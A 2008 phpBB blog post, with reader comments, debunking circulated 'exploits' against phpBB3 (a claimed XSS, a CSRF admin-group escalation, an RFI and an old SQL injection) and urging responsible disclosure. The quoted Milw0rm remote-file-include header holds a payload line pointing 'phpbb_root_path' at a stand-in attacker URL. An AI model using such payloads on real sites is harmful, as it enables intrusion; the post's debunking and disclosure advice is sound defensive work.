“Exploits from the crypt – let’s put them back”

Posted by Kellanved in Development with the tags , , , on July 6th, 2008

Yes, it is no secret that phpBB’s reputation regarding security has not yet recovered completely. We take every report about possible vulnerabilities seriously and are deeply grateful about reports on our security tracker. We give full credit for all undisclosed valid reports made on our trackers.

Even if one is not sure about what happened, the nice guys from the Incident Investigation Team will help you figure it out. If in doubt: report.

The things floating on the web and frequently washing up in our tracker are usually not valid, however. Ready for the fun? Here comes the first installment of “Exploits from the crypt”:


Name: “[0day] phpBB3 XSS via Private Messages”

Age: 3 Months

Kernel of truth: Unknown – probably none

Source: ask google about th0r

Status: Bogus

Aha! Do you remember the CSRF vulnerabilities on phpBB that I posted before? I’m sure you still remember that! Today I just went to several board and email(s) that I’ve got an access to – Well, I’d like to leave the question on the credibilities of that access, whether they are legal or not, to each of your imaginations. That is not important anyway, what is important and will be the core of this topic is a finding of 0day vulnerabilities on phpBB3 private messaging system.

Oh joy. I won’t go into that “CSRF”, which would fail based on the same domain policy. Anyhow, let’s follow the agenda he set.

Yes! That phpBB3 – The latest version of phpBB products, one of the best and free automated forum machines. They got an XSS (Cross Site Scripting) vulnerabilities within their private messaging system for this time. I hope that this vulnerabilities going to be patched by phpBB, but also that some of my readers here gained advantages already out of this interesting vulnerability.

Again: the responsible thing is to report anything – regardless of the validity – to our tracker. Tagging it “0-day” and posting it on the web is not only irresponsible, but also an excellent chance of getting an “open mouth – insert foot” moment. While we are at it, what’s “one of the best” supposed to mean?

So yeah – Here is the XSS vulnerability that I am talking about up there!


Let’s say that this is the format of the URL when you’re about to test and/or put this vulnerability in your targeted forum:

Code: Select all

Where [xss] need to be changed and replaced with several javascript and/or vBscript, etc (It’s all up to your imaginations) – I’m not going to gave out any step-by-step tutorial for doing this, do your own experiment(s):

Code: Select all

Aha. So the idea is that a parameter f is used in the PM compose module of the UCP. Let’s see where that leads…

Code: Select all
$ grep -iR "request_var('f'" includes/ucp/*

includes/ucp/ucp_main.php: $forums = array_keys(request_var('f', array(0 => 0)));

includes/ucp/ucp_pm.php: $folder_id = request_var('f', PRIVMSGS_NO_BOX);<

includes/ucp/ucp_pm_compose.php: // $folder_id = request_var('f', PRIVMSGS_NO_BOX);


Hmm. Seems that the parameter ‘f’ is only used as integer or integer array. Moreover it is not used at all in ucp_pm_compose, as the line is commented out. But well, maybe it is a breach of our coding guidelines and used directly?

Code: Select all
$ grep -iR "T\['f'" includes/ucp/*



Weird. Is the vulnerability – gasp – maybe just made up?

So let’s look at the file itself: ucp_pm_compose. No direct use of the query string, nothing how a parameter ‘f’ could get into the output.

Indeed, visiting “ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779” on a “traget”[sic], doesn’t produce ‘[xss]’ in the html, not even with valid ids. Having collected that evidence, I hereby rule this exploit : Bogus

In order to do any redirection, you can go and use these script(s): […]

I’ll spare you the implementation of a cookie grabber. Sounds a lot like sesame street anyway.

So, have fun!

We had. Thanks a lot.

NB: This is not tested! So please do not sent any complaint to me – I found it on some underground site(s) and this is not my personal stuff(s)!

Why have you published it then?


Name: “CSRF on phpBB – Add yourself to Admin Group”

Age: 6 Months

Kernel of truth: If one could get into the vault, he might rob the bank

Source: ask Google about th0r

Status: Bogus

Oh well. Now let’s come to that “CSRF”.

Ok, i found this from one of the Gmail Inbox that I was playing with before. It’s kinda funny though and it’s still a 0day (Brand new exploit) i believe.

Okay. Thanks for added explanation, although my opinion is that there’s no such thing as a second-hand 0-day.

We’ve already know that CSRF Injection is a malicious technique that makes some trusted user(s) of some specific website(s) run some command(s) – And we’ve been talking about the real owner of a Gmail Account that goes to CSRF Example page of mine and execute the command to logged himself off the Gmail Account automatically.

In this case, we’re about to see a PoC (Proof of Concept) of a script, which going to make Administrator(s) of some phpBB add a user (Can be you – Can also be everyone. Depending on how you set the script) to the Administrator Group. This can be a dangerous exploit for those phpBB Owner.

Oh boy. I can hardly wait. Can you?

Here is the script:


In order to make this script run perfectly, one need to run it locally (As *.html in the local machine). Because it uses xmlhttprequest which going to be rejected by firefox security – Since firefox security won’t allow a site to run xmlhttp.

Aha. Looking at that script, it is using Ajax to obtain valid credentials and then perform actions. The quirky sentence about xmlhttprequest hints it: thanks to the same domain policy enforced in modern browsers, this can’t work. The only way to make such things work, would be either able to upload files to the target domain or knowing an XSS. Neither is present here, so that this “exploit” is a thought experiment about what to do with an actual exploit. Essentially, he’s saying “If I could open the barn door, I could steal a horse”.

It still can be very useful and dangerous – Since some malicious guys can just put some interesting software and/or hacks of some specific CMS (Or maybe e-banking) and put it in *.html file(s) along with this script on it. Once the owner of the site open it up, and he must be logged in as Administrator on that site – Then we can be the administrator there too.

Indeed. Hooray. Oh wait a moment. We need to upload a file to the target … So this is a plan to break into the bank under the premise of having the key and access to the vault?

In order to run this program properly, we also need to change the postdata and siteurl on that script. Do not forget to changed the admin groupid within the variable postdata.

And don’t forget to ask nicely for that key.

The lesson to learn from this certainly is: don’t underestimate XSS and don’t think it is harmless to allow people to upload files to your domain unscreened. It is not a vulnerability, but an alarming example on what people might do with a vulnerability.

Next please.

III – something else: wrong recipient

Name: “Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit”

Age: 16 Months

Kernel of truth: phpBB2 preMOD from 2004

Source: Milw0rm

Status: Don’t ask us

Code: Select all
# (C) xoron


# [Name: phpBB Extreme 3.0.1

(phpbb_root_path) Remote File Include Exploit ]


# [Author: xoron]

# [Exploit coded by xoron]


# [Download: ]


# [Tesekkurler: pang0, DJR]


# [POC: /includes/functions.php?phpbb_root_path=http://evilscripts?]...

Okay. Stop right here. phpBB Extreme is not phpBB. phpBB Extreme saw its last release in 2004 and doesn’t seem to share a single line of code with phpBB 3.0.1. And to be very clear: phpBB2 never had such a vulnerability either.

IV – the bogus, the misguided and the … ancient

Name: “PhpBB 3 memberlist.php/’ip’ argument SQL injection”

Age: ~24 Months

Kernel of truth: Old phpBB3 Beta

Source: Bugtraq/Google

Status: Fixed a loooong time ago

This one still floats around a lot and gets reported regularly. In fact one of the very old Betas, long before the RC stage, really had this issue. Alas, only if the attacker enjoyed global moderator privileges.

Nonetheless, is this a good example why the strict adherence to coding guidelines is so important. It also shows why the betas were not intended for live use.


Well, that’s it for today. The really important message is: report anything you find. Bonus points for well researched reports. Also don’t be alarmed by people claiming to have exploits – investigate them and – if in doubt – report them to us. That won’t take away the option to blog about them later on.

Bottom line: Report to the security tracker. You will not miss out on fame. Furthermore, we will not make fun of you – regardless of the report’s validity. Just report.

Moreover, we give full credit to people who do the responsible thing of giving us the breathing space to fix things before disclosing them. After all, the quickest way to make the web safer is giving us the day we need.

  1. Research something thoroughly (only if you want to do 5)
  2. Find the right vendor
  3. Should the phpBB group be that vendor: Report to our Security Tracker
  4. Wait
  5. Disclose

21 Responses to ““Exploits from the crypt – let’s put them back””

Posted by MartectX on July 13th, 2008 at 1:02 am:

I like this article and hope for more!

Posted by Derky on July 13th, 2008 at 9:20 am:

Thanks for this article, it’s very nice.
I’m getting lately a lot of RFI requests for some “PhpRaider Mod phpbb3” allthough I’m not even using that MOD… It are very dumb people most of the time, scripkiddies. (they are often using phpBB2 exploits on phpBB3 to -_-‘)

Posted by c4gamerz on July 13th, 2008 at 3:58 pm:


I salute phpbb team for such a wonderful work and what ever you guyz are doing is simply awesome!

But i am really not happy with incident tracker team as i reported my friends board which was defaced by some hackerz they changed index file so i reported this issue but no one answered so after few days i went to and asked them to talk to some responsible incident tracker member and ask incident tracker team members to reply to my ticket and thats how i got the reply after almost a week.

Moral of the story: You should take this type of tickets seriously and give number one priority to security issues or else forget about phpbb reputation regarding security!!

Posted by Kellanved on July 14th, 2008 at 11:31 am:


No serious exploitable vulnerability in 3.0.0 has surfaced so far. Moreover, the software was audited by one of the foremost php security experts.

Nonetheless, we take any report seriously. However, we are not clairvoyant.

Posted by Techie-Micheal on July 14th, 2008 at 3:53 pm:


Sometimes those requests come from bots, so it isn’t so much about intelligence it is just going around trying to find something to break in to.


As the person responsible for forming said team, I’m sorry you had a bad experience. A couple of things could have led to the timeline, such as where you were in the queue, the amount of information you were able to provide at the time, and the fact that a number of team members are preparing to go to London in less than a week.

Posted by Techie-Micheal on July 14th, 2008 at 8:30 pm:

“so it isn’t so much about intelligence it is just going around trying to find something to break in to.” should read: “so it isn’t so much about intelligence as it is just going around trying to find something to break in to.”

Posted by Mikov on July 15th, 2008 at 11:31 am:

I have seen much effort from dev team on security issues, I believe phpBB will became the safest forum software.

Posted by Paul on July 15th, 2008 at 8:11 pm:

One of the reasons also is probarly that your site is bigger as a average site. The chance that a exploit has a lot impact is then a lot larger. Thats maybe one of the reasons they try so much as possible exploits.

Posted by typefreak on July 18th, 2008 at 12:49 pm:

[quote]Indeed. Hooray. Oh wait a moment. We need to upload a file to the target … So this is a plan to break into the bank under the premise of having the key and access to the vault?[/quote]

This may be easier than you think. For example, shared hosting which uses a central domain name with user accounts like host.ext/~username
Off-course, once you have your own domain it won’t be a problem anymore.

Posted by RobertK on July 21st, 2008 at 2:34 pm:


PHPBB is not responsible for your friend’s problem: your friend is. If either the server is compromised or your friend’s FTP password, then it’s absolute child’s play to “hijack” the index page.

Don’t blame the PHPBB team for things they cannot affect, like your friend picking good passwords or rotating said passwords monthly. They cannot give this password away either.

@ the article:

I’m glad to hear that all the doubts about PHPBB3’s security are not just old, but largely fallacious. The last time I used PHPBB3 I was impressed with it, which is a huge change as I positively loathed PHPBB2.

Keep up the good work, folks.

Posted by KHolman on July 22nd, 2008 at 2:00 am:

Was pleased to see this blog entry. I was especially curious about SQL injection since it was something I’d only recently become aware of when a day job related app was cited for vulnerability by the security teams.

Posted by c4gamerz on July 24th, 2008 at 4:46 pm:


I am not blamming phpbb i just suggested phpbb team to give top priority to security issues nothing else!!

Posted by anonymouse on July 25th, 2008 at 3:29 pm:

we see this hundreds of times a day – what does it do?

Posted by Lexi on July 25th, 2008 at 9:49 pm:

webmaster is able to hack into user accounts, change login name and password.This makes it a very insure site that you have set up.

Posted by bantu on July 26th, 2008 at 10:43 am:

It tries to exploit that phpBB installation with a known exploit. Anyway, this is not a support section, this is a comment section.

Posted by bantu on July 26th, 2008 at 10:46 am:

Errrm. “known exploit” of course means “old, fixed exploit”.

Posted by Acyd Burn on July 31st, 2008 at 4:31 pm:

A fixed exploit within a Mod or a fork or some portal. phpBB was never prone to this sort of attack. 😉

Posted by Micheal's rantings, ravings, and general banter on August 18th, 2008 at 5:32 pm:

Sun needs to revise their update strategies…

As the creator of the Java programming language, Sun is responsible for maintaining updates to the language and the interpreter and compiler. However, their current update strategy leaves customers at risk even after they have updated.

As you may or m…

Posted by Ause on April 26th, 2009 at 5:57 am:

Thanks for the great write up. I found it very amusing. It just goes to show there are scary people out there who will work hard at posting nonsense such as bogus exploits while doing very little to post anything positive.

Posted by Dominick Matyas on March 13th, 2010 at 2:22 am:

Sup, what web log platform are you using? It looks sweet.

Posted by resell rights on June 24th, 2010 at 4:19 am:

Please, can you PM me and tell me few more things about this, I really like blogs like yours…

Commenting is disabled for this blog post